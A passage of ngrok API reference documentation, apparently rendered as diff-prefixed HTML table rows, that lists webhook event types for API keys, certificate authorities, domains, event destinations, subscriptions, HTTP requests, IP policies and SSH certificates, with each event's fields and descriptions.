+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

unique API key resource identifier

+
uristring

URI to the API resource of this API key

+
descriptionstring

human-readable description of what uses the API key to authenticate. optional, max 255 bytes.

+
metadatastring

arbitrary user-defined data of this API key. optional, max 4096 bytes

+
created_atstring

timestamp when the api key was created, RFC 3339 format

+
tokenstring

the bearer token that can be placed into the Authorization header to authenticate request to the ngrok API. This value is only available one time, on the API response from key creation. Otherwise it is null.

+
+
api_key_updated.v0
+

Triggers when an API key is updated

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

unique API key resource identifier

+
uristring

URI to the API resource of this API key

+
descriptionstring

human-readable description of what uses the API key to authenticate. optional, max 255 bytes.

+
metadatastring

arbitrary user-defined data of this API key. optional, max 4096 bytes

+
created_atstring

timestamp when the api key was created, RFC 3339 format

+
tokenstring

the bearer token that can be placed into the Authorization header to authenticate request to the ngrok API. This value is only available one time, on the API response from key creation. Otherwise it is null.

+
+
certificate_authority_created.v0
+

Triggers when a certificate authority is created

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

unique identifier for this Certificate Authority

+
uristring

URI of the Certificate Authority API resource

+
created_atstring

timestamp when the Certificate Authority was created, RFC 3339 format

+
descriptionstring

human-readable description of this Certificate Authority. optional, max 255 bytes.

+
metadatastring

arbitrary user-defined machine-readable data of this Certificate Authority. optional, max 4096 bytes.

+
ca_pemstring

raw PEM of the Certificate Authority

+
subject_common_namestring

subject common name of the Certificate Authority

+
not_beforestring

timestamp when this Certificate Authority becomes valid, RFC 3339 format

+
not_afterstring

timestamp when this Certificate Authority becomes invalid, RFC 3339 format

+
key_usagesList<string>

set of actions the private key of this Certificate Authority can be used for

+
extended_key_usagesList<string>

extended set of actions the private key of this Certificate Authority can be used for

+
+
certificate_authority_deleted.v0
+

Triggers when a certificate authority is deleted

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

unique identifier for this Certificate Authority

+
uristring

URI of the Certificate Authority API resource

+
created_atstring

timestamp when the Certificate Authority was created, RFC 3339 format

+
descriptionstring

human-readable description of this Certificate Authority. optional, max 255 bytes.

+
metadatastring

arbitrary user-defined machine-readable data of this Certificate Authority. optional, max 4096 bytes.

+
ca_pemstring

raw PEM of the Certificate Authority

+
subject_common_namestring

subject common name of the Certificate Authority

+
not_beforestring

timestamp when this Certificate Authority becomes valid, RFC 3339 format

+
not_afterstring

timestamp when this Certificate Authority becomes invalid, RFC 3339 format

+
key_usagesList<string>

set of actions the private key of this Certificate Authority can be used for

+
extended_key_usagesList<string>

extended set of actions the private key of this Certificate Authority can be used for

+
+
certificate_authority_updated.v0
+

Triggers when a certificate authority is updated

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

unique identifier for this Certificate Authority

+
uristring

URI of the Certificate Authority API resource

+
created_atstring

timestamp when the Certificate Authority was created, RFC 3339 format

+
descriptionstring

human-readable description of this Certificate Authority. optional, max 255 bytes.

+
metadatastring

arbitrary user-defined machine-readable data of this Certificate Authority. optional, max 4096 bytes.

+
ca_pemstring

raw PEM of the Certificate Authority

+
subject_common_namestring

subject common name of the Certificate Authority

+
not_beforestring

timestamp when this Certificate Authority becomes valid, RFC 3339 format

+
not_afterstring

timestamp when this Certificate Authority becomes invalid, RFC 3339 format

+
key_usagesList<string>

set of actions the private key of this Certificate Authority can be used for

+
extended_key_usagesList<string>

extended set of actions the private key of this Certificate Authority can be used for

+
+
domain_created.v0
+

Triggers when a domain is created

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

unique reserved domain resource identifier

+
uristring

URI of the reserved domain API resource

+
created_atstring

timestamp when the reserved domain was created, RFC 3339 format

+
descriptionstring

human-readable description of what this reserved domain will be used for

+
metadatastring

arbitrary user-defined machine-readable data of this reserved domain. Optional, max 4096 bytes.

+
domainstring

hostname of the reserved domain

+
regionstring

reserve the domain in this geographic ngrok datacenter. Optional, default is us. (au, eu, ap, us, jp, in, sa)

+
cname_targetstring

DNS CNAME target for a custom hostname, or null if the reserved domain is a subdomain of *.ngrok.io

+
certificate.idstring

a resource identifier

+
certificate.uristring

a uri for locating a resource

+
certificate_management_policy.authoritystring

certificate authority to request certificates from. The only supported value is letsencrypt.

+
certificate_management_policy.private_key_typestring

type of private key to use when requesting certificates. Defaults to rsa, can be either rsa or ecdsa.

+
certificate_management_status.renews_atstring

timestamp when the next renewal will be requested, RFC 3339 format

+
certificate_management_status.provisioning_job.error_codestring

if present, an error code indicating why provisioning is failing. It may be either a temporary condition (INTERNAL_ERROR), or a permanent one the user must correct (DNS_ERROR).

+
certificate_management_status.provisioning_job.msgstring

a message describing the current status or error

+
certificate_management_status.provisioning_job.started_atstring

timestamp when the provisioning job started, RFC 3339 format

+
certificate_management_status.provisioning_job.retries_atstring

timestamp when the provisioning job will be retried

+
acme_challenge_cname_targetstring

DNS CNAME target for the host _acme-challenge.example.com, where example.com is your reserved domain name. This is required to issue certificates for wildcard, non-ngrok reserved domains. Must be null for non-wildcard domains and ngrok subdomains.

+
+
domain_deleted.v0
+

Triggers when a domain is deleted

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

unique reserved domain resource identifier

+
uristring

URI of the reserved domain API resource

+
created_atstring

timestamp when the reserved domain was created, RFC 3339 format

+
descriptionstring

human-readable description of what this reserved domain will be used for

+
metadatastring

arbitrary user-defined machine-readable data of this reserved domain. Optional, max 4096 bytes.

+
domainstring

hostname of the reserved domain

+
regionstring

reserve the domain in this geographic ngrok datacenter. Optional, default is us. (au, eu, ap, us, jp, in, sa)

+
cname_targetstring

DNS CNAME target for a custom hostname, or null if the reserved domain is a subdomain of *.ngrok.io

+
certificate.idstring

a resource identifier

+
certificate.uristring

a uri for locating a resource

+
certificate_management_policy.authoritystring

certificate authority to request certificates from. The only supported value is letsencrypt.

+
certificate_management_policy.private_key_typestring

type of private key to use when requesting certificates. Defaults to rsa, can be either rsa or ecdsa.

+
certificate_management_status.renews_atstring

timestamp when the next renewal will be requested, RFC 3339 format

+
certificate_management_status.provisioning_job.error_codestring

if present, an error code indicating why provisioning is failing. It may be either a temporary condition (INTERNAL_ERROR), or a permanent one the user must correct (DNS_ERROR).

+
certificate_management_status.provisioning_job.msgstring

a message describing the current status or error

+
certificate_management_status.provisioning_job.started_atstring

timestamp when the provisioning job started, RFC 3339 format

+
certificate_management_status.provisioning_job.retries_atstring

timestamp when the provisioning job will be retried

+
acme_challenge_cname_targetstring

DNS CNAME target for the host _acme-challenge.example.com, where example.com is your reserved domain name. This is required to issue certificates for wildcard, non-ngrok reserved domains. Must be null for non-wildcard domains and ngrok subdomains.

+
+
domain_updated.v0
+

Triggers when a domain is updated

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

unique reserved domain resource identifier

+
uristring

URI of the reserved domain API resource

+
created_atstring

timestamp when the reserved domain was created, RFC 3339 format

+
descriptionstring

human-readable description of what this reserved domain will be used for

+
metadatastring

arbitrary user-defined machine-readable data of this reserved domain. Optional, max 4096 bytes.

+
domainstring

hostname of the reserved domain

+
regionstring

reserve the domain in this geographic ngrok datacenter. Optional, default is us. (au, eu, ap, us, jp, in, sa)

+
cname_targetstring

DNS CNAME target for a custom hostname, or null if the reserved domain is a subdomain of *.ngrok.io

+
certificate.idstring

a resource identifier

+
certificate.uristring

a uri for locating a resource

+
certificate_management_policy.authoritystring

certificate authority to request certificates from. The only supported value is letsencrypt.

+
certificate_management_policy.private_key_typestring

type of private key to use when requesting certificates. Defaults to rsa, can be either rsa or ecdsa.

+
certificate_management_status.renews_atstring

timestamp when the next renewal will be requested, RFC 3339 format

+
certificate_management_status.provisioning_job.error_codestring

if present, an error code indicating why provisioning is failing. It may be either a temporary condition (INTERNAL_ERROR), or a permanent one the user must correct (DNS_ERROR).

+
certificate_management_status.provisioning_job.msgstring

a message describing the current status or error

+
certificate_management_status.provisioning_job.started_atstring

timestamp when the provisioning job started, RFC 3339 format

+
certificate_management_status.provisioning_job.retries_atstring

timestamp when the provisioning job will be retried

+
acme_challenge_cname_targetstring

DNS CNAME target for the host _acme-challenge.example.com, where example.com is your reserved domain name. This is required to issue certificates for wildcard, non-ngrok reserved domains. Must be null for non-wildcard domains and ngrok subdomains.

+
+
event_destination_created.v0
+

Triggers when an Event Destination is created

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

Unique identifier for this Event Destination.

+
metadatastring

Arbitrary user-defined machine-readable data of this Event Destination. Optional, max 4096 bytes.

+
created_atstring

Timestamp when the Event Destination was created, RFC 3339 format.

+
descriptionstring

Human-readable description of the Event Destination. Optional, max 255 bytes.

+
formatstring

The output format you would like to serialize events into when sending to their target. Currently the only accepted value is JSON.

+
target.firehose.auth.role.role_arnstring

An ARN that specifies the role that ngrok should use to deliver to the configured target.

+
target.firehose.auth.creds.aws_access_key_idstring

The ID portion of an AWS access key.

+
target.firehose.auth.creds.aws_secret_access_keystring

The secret portion of an AWS access key.

+
target.firehose.delivery_stream_arnstring

An Amazon Resource Name specifying the Firehose delivery stream to deposit events into.

+
target.kinesis.auth.role.role_arnstring

An ARN that specifies the role that ngrok should use to deliver to the configured target.

+
target.kinesis.auth.creds.aws_access_key_idstring

The ID portion of an AWS access key.

+
target.kinesis.auth.creds.aws_secret_access_keystring

The secret portion of an AWS access key.

+
target.kinesis.stream_arnstring

An Amazon Resource Name specifying the Kinesis stream to deposit events into.

+
target.cloudwatch_logs.auth.role.role_arnstring

An ARN that specifies the role that ngrok should use to deliver to the configured target.

+
target.cloudwatch_logs.auth.creds.aws_access_key_idstring

The ID portion of an AWS access key.

+
target.cloudwatch_logs.auth.creds.aws_secret_access_keystring

The secret portion of an AWS access key.

+
target.cloudwatch_logs.log_group_arnstring

An Amazon Resource Name specifying the CloudWatch Logs group to deposit events into.

+
uristring

URI of the Event Destination API resource.

+
+
event_destination_deleted.v0
+

Triggers when an Event Destination is deleted

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

Unique identifier for this Event Destination.

+
metadatastring

Arbitrary user-defined machine-readable data of this Event Destination. Optional, max 4096 bytes.

+
created_atstring

Timestamp when the Event Destination was created, RFC 3339 format.

+
descriptionstring

Human-readable description of the Event Destination. Optional, max 255 bytes.

+
formatstring

The output format you would like to serialize events into when sending to their target. Currently the only accepted value is JSON.

+
target.firehose.auth.role.role_arnstring

An ARN that specifies the role that ngrok should use to deliver to the configured target.

+
target.firehose.auth.creds.aws_access_key_idstring

The ID portion of an AWS access key.

+
target.firehose.auth.creds.aws_secret_access_keystring

The secret portion of an AWS access key.

+
target.firehose.delivery_stream_arnstring

An Amazon Resource Name specifying the Firehose delivery stream to deposit events into.

+
target.kinesis.auth.role.role_arnstring

An ARN that specifies the role that ngrok should use to deliver to the configured target.

+
target.kinesis.auth.creds.aws_access_key_idstring

The ID portion of an AWS access key.

+
target.kinesis.auth.creds.aws_secret_access_keystring

The secret portion of an AWS access key.

+
target.kinesis.stream_arnstring

An Amazon Resource Name specifying the Kinesis stream to deposit events into.

+
target.cloudwatch_logs.auth.role.role_arnstring

An ARN that specifies the role that ngrok should use to deliver to the configured target.

+
target.cloudwatch_logs.auth.creds.aws_access_key_idstring

The ID portion of an AWS access key.

+
target.cloudwatch_logs.auth.creds.aws_secret_access_keystring

The secret portion of an AWS access key.

+
target.cloudwatch_logs.log_group_arnstring

An Amazon Resource Name specifying the CloudWatch Logs group to deposit events into.

+
uristring

URI of the Event Destination API resource.

+
+
event_destination_updated.v0
+

Triggers when an Event Destination is updated

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

Unique identifier for this Event Destination.

+
metadatastring

Arbitrary user-defined machine-readable data of this Event Destination. Optional, max 4096 bytes.

+
created_atstring

Timestamp when the Event Destination was created, RFC 3339 format.

+
descriptionstring

Human-readable description of the Event Destination. Optional, max 255 bytes.

+
formatstring

The output format you would like to serialize events into when sending to their target. Currently the only accepted value is JSON.

+
target.firehose.auth.role.role_arnstring

An ARN that specifies the role that ngrok should use to deliver to the configured target.

+
target.firehose.auth.creds.aws_access_key_idstring

The ID portion of an AWS access key.

+
target.firehose.auth.creds.aws_secret_access_keystring

The secret portion of an AWS access key.

+
target.firehose.delivery_stream_arnstring

An Amazon Resource Name specifying the Firehose delivery stream to deposit events into.

+
target.kinesis.auth.role.role_arnstring

An ARN that specifies the role that ngrok should use to deliver to the configured target.

+
target.kinesis.auth.creds.aws_access_key_idstring

The ID portion of an AWS access key.

+
target.kinesis.auth.creds.aws_secret_access_keystring

The secret portion of an AWS access key.

+
target.kinesis.stream_arnstring

An Amazon Resource Name specifying the Kinesis stream to deposit events into.

+
target.cloudwatch_logs.auth.role.role_arnstring

An ARN that specifies the role that ngrok should use to deliver to the configured target.

+
target.cloudwatch_logs.auth.creds.aws_access_key_idstring

The ID portion of an AWS access key.

+
target.cloudwatch_logs.auth.creds.aws_secret_access_keystring

The secret portion of an AWS access key.

+
target.cloudwatch_logs.log_group_arnstring

An Amazon Resource Name specifying the CloudWatch Logs group to deposit events into.

+
uristring

URI of the Event Destination API resource.

+
+
event_subscription_created.v0
+

Triggers when an Event Subscription is created

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

Unique identifier for this Event Subscription.

+
uristring

URI of the Event Subscription API resource.

+
created_atstring

When the Event Subscription was created (RFC 3339 format).

+
metadatastring

Arbitrary customer supplied information intended to be machine readable. Optional, max 4096 chars.

+
descriptionstring

Arbitrary customer supplied information intended to be human readable. Optional, max 255 chars.

+
sources.typestring

Type of event for which an event subscription will trigger

+
sources.uristring

URI of the Event Source API resource.

+
destinations.idstring

a resource identifier

+
destinations.uristring

a uri for locating a resource

+
+
event_subscription_deleted.v0
+

Triggers when an Event Subascription is deleted

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

Unique identifier for this Event Subscription.

+
uristring

URI of the Event Subscription API resource.

+
created_atstring

When the Event Subscription was created (RFC 3339 format).

+
metadatastring

Arbitrary customer supplied information intended to be machine readable. Optional, max 4096 chars.

+
descriptionstring

Arbitrary customer supplied information intended to be human readable. Optional, max 255 chars.

+
sources.typestring

Type of event for which an event subscription will trigger

+
sources.uristring

URI of the Event Source API resource.

+
destinations.idstring

a resource identifier

+
destinations.uristring

a uri for locating a resource

+
+
event_subscription_updated.v0
+

Triggers when an Event Subscription is updated

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

Unique identifier for this Event Subscription.

+
uristring

URI of the Event Subscription API resource.

+
created_atstring

When the Event Subscription was created (RFC 3339 format).

+
metadatastring

Arbitrary customer supplied information intended to be machine readable. Optional, max 4096 chars.

+
descriptionstring

Arbitrary customer supplied information intended to be human readable. Optional, max 255 chars.

+
sources.typestring

Type of event for which an event subscription will trigger

+
sources.uristring

URI of the Event Source API resource.

+
destinations.idstring

a resource identifier

+
destinations.uristring

a uri for locating a resource

+
+
http_request_complete.v0
+

Triggers when an HTTP request completes.

+

+This event type supports filters and selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
backend.connection_reusedbool

True if ngrok reused a TCP connection to transmit the HTTP request to the upstream service.

+
basic_auth.decisionstring

‘allow’ if the Basic Auth module permitted the request to the upstream service, otherwise ‘block’

+
basic_auth.usernamestring

The username in the HTTP basic auth credentials

+
circuit_breaker.decisionstring

Whether the HTTP request was sent to the upstream service. ‘allow’ if the breaker was closed, ‘block’ if the breaker was open, ‘allow_while_open’ if the request was allowed while the breaker is open

+
compression.algorithmstring

The compression algorithm used to encode responses from the endpoint. Either ‘gzip’, ‘deflate’, or ‘none’.

+
compression.bytes_savedint64

The difference between the size of the raw response and the size of the response as compressed by the Compression Module

+
conn.client_ipstringfilterable

The source IP of the TCP connection to the ngrok edge

+
conn.server_ipstringfilterable

The IP address of the server that received the request

+
conn.server_namestringfilterable

The hostname associated with this connection.

+
conn.server_portint32filterable

The port that the connection for this request came in on

+
conn.start_tstimestamp

The timestamp when the TCP connection to the ngrok edge is established

+
http.request.body_lengthint64

The size of the request body in bytes

+
http.request.headersMap<string, List<string>>

A map of normalized headers from the requesting client. Header keys are capitalized and header values are lowercased.

+
http.request.methodstring

The request method, normalized to lowercase

+
http.request.url.hoststring

The host component of the request URL

+
http.request.url.pathstring

The path component of the request URL

+
http.request.url.querystring

The query string component of the request URL

+
http.request.url.rawstring

The full URL of the request including scheme, host, path, and query string

+
http.request.url.schemestring

The scheme component of the request URL

+
http.request.user_agentstring

The value of the User-Agent header in the request received by ngrok edge

+
http.response.body_lengthint64

The size of the response body in bytes

+
http.response.headersMap<string, List<string>>

A map of normalized response headers. Header keys are capitalized and header values are lowercased.

+
http.response.status_codeint32

The status code of the response returned by the ngrok edge

+
ip_policy.decisionstring

‘allow’ if IP Policy module permitted the request to the upstream service, ‘block’ otherwise

+
oauth.app_client_idstring

The OAuth application client ID

+
oauth.decisionstring

‘allow’ if the OAuth module permitted the request to the upstream service, ‘block’ otherwise

+
oauth.user.idstring

The authenticated user’s ID returned by the OAuth provider

+
oauth.user.namestring

The authenticated user’s name returned by the OAuth provider

+
tls.cipher_suitestring

The cipher suite selected during the TLS handshake

+
tls.client_cert.serial_numberstring

The serial number of the client’s leaf TLS certificate in the Mutual TLS handshake

+
tls.client_cert.subject.cnstring

The subject common name of the client’s leaf TLS certificate in the Mutual TLS handshake

+
tls.versionstring

The version of the TLS protocol used between the client and the ngrok edge

+
webhook_validation.decisionstring

‘allow’ if the Webhook Verification module permitted the request to the upstream service, ‘block’ otherwise

+
+
ip_policy_created.v0
+

Triggers when an IP Policy is created

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

unique identifier for this IP policy

+
uristring

URI of the IP Policy API resource

+
created_atstring

timestamp when the IP policy was created, RFC 3339 format

+
descriptionstring

human-readable description of the source IPs of this IP policy. optional, max 255 bytes.

+
metadatastring

arbitrary user-defined machine-readable data of this IP policy. optional, max 4096 bytes.

+
actionstring

the IP policy action. Supported values are allow or deny

+
+
ip_policy_deleted.v0
+

Triggers when an IP Policy is deleted

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

unique identifier for this IP policy

+
uristring

URI of the IP Policy API resource

+
created_atstring

timestamp when the IP policy was created, RFC 3339 format

+
descriptionstring

human-readable description of the source IPs of this IP policy. optional, max 255 bytes.

+
metadatastring

arbitrary user-defined machine-readable data of this IP policy. optional, max 4096 bytes.

+
actionstring

the IP policy action. Supported values are allow or deny

+
+
ip_policy_rule_created.v0
+

Triggers when an IP Policy Rule is created

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

unique identifier for this IP policy rule

+
uristring

URI of the IP policy rule API resource

+
created_atstring

timestamp when the IP policy rule was created, RFC 3339 format

+
descriptionstring

human-readable description of the source IPs of this IP rule. optional, max 255 bytes.

+
metadatastring

arbitrary user-defined machine-readable data of this IP policy rule. optional, max 4096 bytes.

+
cidrstring

an IP or IP range specified in CIDR notation. IPv4 and IPv6 are both supported.

+
ip_policy.idstring

a resource identifier

+
ip_policy.uristring

a uri for locating a resource

+
+
ip_policy_rule_deleted.v0
+

Triggers when an IP Policy Rule is deleted

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

unique identifier for this IP policy rule

+
uristring

URI of the IP policy rule API resource

+
created_atstring

timestamp when the IP policy rule was created, RFC 3339 format

+
descriptionstring

human-readable description of the source IPs of this IP rule. optional, max 255 bytes.

+
metadatastring

arbitrary user-defined machine-readable data of this IP policy rule. optional, max 4096 bytes.

+
cidrstring

an IP or IP range specified in CIDR notation. IPv4 and IPv6 are both supported.

+
ip_policy.idstring

a resource identifier

+
ip_policy.uristring

a uri for locating a resource

+
+
ip_policy_rule_updated.v0
+

Triggers when an IP Policy Rule is updated

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

unique identifier for this IP policy rule

+
uristring

URI of the IP policy rule API resource

+
created_atstring

timestamp when the IP policy rule was created, RFC 3339 format

+
descriptionstring

human-readable description of the source IPs of this IP rule. optional, max 255 bytes.

+
metadatastring

arbitrary user-defined machine-readable data of this IP policy rule. optional, max 4096 bytes.

+
cidrstring

an IP or IP range specified in CIDR notation. IPv4 and IPv6 are both supported.

+
ip_policy.idstring

a resource identifier

+
ip_policy.uristring

a uri for locating a resource

+
+
ip_policy_updated.v0
+

Triggers when an IP Policy is updated

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

unique identifier for this IP policy

+
uristring

URI of the IP Policy API resource

+
created_atstring

timestamp when the IP policy was created, RFC 3339 format

+
descriptionstring

human-readable description of the source IPs of this IP policy. optional, max 255 bytes.

+
metadatastring

arbitrary user-defined machine-readable data of this IP policy. optional, max 4096 bytes.

+
actionstring

the IP policy action. Supported values are allow or deny

+
+
ip_restriction_created.v0
+

Triggers when an IP Restriction is created

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

unique identifier for this IP restriction

+
uristring

URI of the IP restriction API resource

+
created_atstring

timestamp when the IP restriction was created, RFC 3339 format

+
descriptionstring

human-readable description of this IP restriction. optional, max 255 bytes.

+
metadatastring

arbitrary user-defined machine-readable data of this IP restriction. optional, max 4096 bytes.

+
enforcedboolean

true if the IP restriction will be enforced. if false, only warnings will be issued

+
typestring

the type of IP restriction. this defines what traffic will be restricted with the attached policies. four values are currently supported: dashboard, api, agent, and endpoints

+
ip_policies.idstring

a resource identifier

+
ip_policies.uristring

a uri for locating a resource

+
+
ip_restriction_deleted.v0
+

Triggers when an IP Restriction is deleted

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

unique identifier for this IP restriction

+
uristring

URI of the IP restriction API resource

+
created_atstring

timestamp when the IP restriction was created, RFC 3339 format

+
descriptionstring

human-readable description of this IP restriction. optional, max 255 bytes.

+
metadatastring

arbitrary user-defined machine-readable data of this IP restriction. optional, max 4096 bytes.

+
enforcedboolean

true if the IP restriction will be enforced. if false, only warnings will be issued

+
typestring

the type of IP restriction. this defines what traffic will be restricted with the attached policies. four values are currently supported: dashboard, api, agent, and endpoints

+
ip_policies.idstring

a resource identifier

+
ip_policies.uristring

a uri for locating a resource

+
+
ip_restriction_updated.v0
+

Triggers when an IP Restriction is updated

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

unique identifier for this IP restriction

+
uristring

URI of the IP restriction API resource

+
created_atstring

timestamp when the IP restriction was created, RFC 3339 format

+
descriptionstring

human-readable description of this IP restriction. optional, max 255 bytes.

+
metadatastring

arbitrary user-defined machine-readable data of this IP restriction. optional, max 4096 bytes.

+
enforcedboolean

true if the IP restriction will be enforced. if false, only warnings will be issued

+
typestring

the type of IP restriction. this defines what traffic will be restricted with the attached policies. four values are currently supported: dashboard, api, agent, and endpoints

+
ip_policies.idstring

a resource identifier

+
ip_policies.uristring

a uri for locating a resource

+
+
ssh_certificate_authority_created.v0
+

Triggers when an SSH certificate authority is created

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

unique identifier for this SSH Certificate Authority

+
uristring

URI of the SSH Certificate Authority API resource

+
created_atstring

timestamp when the SSH Certificate Authority API resource was created, RFC 3339 format

+
descriptionstring

human-readable description of this SSH Certificate Authority. optional, max 255 bytes.

+
metadatastring

arbitrary user-defined machine-readable data of this SSH Certificate Authority. optional, max 4096 bytes.

+
public_keystring

raw public key for this SSH Certificate Authority

+
key_typestring

the type of private key for this SSH Certificate Authority

+
+
ssh_certificate_authority_deleted.v0
+

Triggers when an SSH certificate authority is deleted

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

unique identifier for this SSH Certificate Authority

+
uristring

URI of the SSH Certificate Authority API resource

+
created_atstring

timestamp when the SSH Certificate Authority API resource was created, RFC 3339 format

+
descriptionstring

human-readable description of this SSH Certificate Authority. optional, max 255 bytes.

+
metadatastring

arbitrary user-defined machine-readable data of this SSH Certificate Authority. optional, max 4096 bytes.

+
public_keystring

raw public key for this SSH Certificate Authority

+
key_typestring

the type of private key for this SSH Certificate Authority

+
+
ssh_certificate_authority_updated.v0
+

Triggers when an SSH certificate authority is updated

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

unique identifier for this SSH Certificate Authority

+
uristring

URI of the SSH Certificate Authority API resource

+
created_atstring

timestamp when the SSH Certificate Authority API resource was created, RFC 3339 format

+
descriptionstring

human-readable description of this SSH Certificate Authority. optional, max 255 bytes.

+
metadatastring

arbitrary user-defined machine-readable data of this SSH Certificate Authority. optional, max 4096 bytes.

+
public_keystring

raw public key for this SSH Certificate Authority

+
key_typestring

the type of private key for this SSH Certificate Authority

+
+
ssh_host_certificate_created.v0
+

Triggers when an SSH host certificate is created

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

unique identifier for this SSH Host Certificate

+
uristring

URI of the SSH Host Certificate API resource

+
created_atstring

timestamp when the SSH Host Certificate API resource was created, RFC 3339 format

+
descriptionstring

human-readable description of this SSH Host Certificate. optional, max 255 bytes.

+
metadatastring

arbitrary user-defined machine-readable data of this SSH Host Certificate. optional, max 4096 bytes.

+
public_keystring

a public key in OpenSSH Authorized Keys format that this certificate signs

+
key_typestring

the key type of the public_key, one of rsa, ecdsa or ed25519

+
ssh_certificate_authority_idstring

the ssh certificate authority that is used to sign this ssh host certificate

+
principalsList<string>

the list of principals included in the ssh host certificate. This is the list of hostnames and/or IP addresses that are authorized to serve SSH traffic with this certificate. Dangerously, if no principals are specified, this certificate is considered valid for all hosts.

+
valid_afterstring

the time when the ssh host certificate becomes valid, in RFC 3339 format.

+
valid_untilstring

the time after which the ssh host certificate becomes invalid, in RFC 3339 format. the OpenSSH certificates RFC calls this valid_before.

+
certificatestring

the signed SSH certificate in OpenSSH Authorized Keys format. this value should be placed in a -cert.pub certificate file on disk that should be referenced in your sshd_config configuration file with a HostCertificate directive

+
+
ssh_host_certificate_deleted.v0
+

Triggers when an SSH host certificate is deleted

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

unique identifier for this SSH Host Certificate

+
uristring

URI of the SSH Host Certificate API resource

+
created_atstring

timestamp when the SSH Host Certificate API resource was created, RFC 3339 format

+
descriptionstring

human-readable description of this SSH Host Certificate. optional, max 255 bytes.

+
metadatastring

arbitrary user-defined machine-readable data of this SSH Host Certificate. optional, max 4096 bytes.

+
public_keystring

a public key in OpenSSH Authorized Keys format that this certificate signs

+
key_typestring

the key type of the public_key, one of rsa, ecdsa or ed25519

+
ssh_certificate_authority_idstring

the ssh certificate authority that is used to sign this ssh host certificate

+
principalsList<string>

the list of principals included in the ssh host certificate. This is the list of hostnames and/or IP addresses that are authorized to serve SSH traffic with this certificate. Dangerously, if no principals are specified, this certificate is considered valid for all hosts.

+
valid_afterstring

the time when the ssh host certificate becomes valid, in RFC 3339 format.

+
valid_untilstring

the time after which the ssh host certificate becomes invalid, in RFC 3339 format. the OpenSSH certificates RFC calls this valid_before.

+
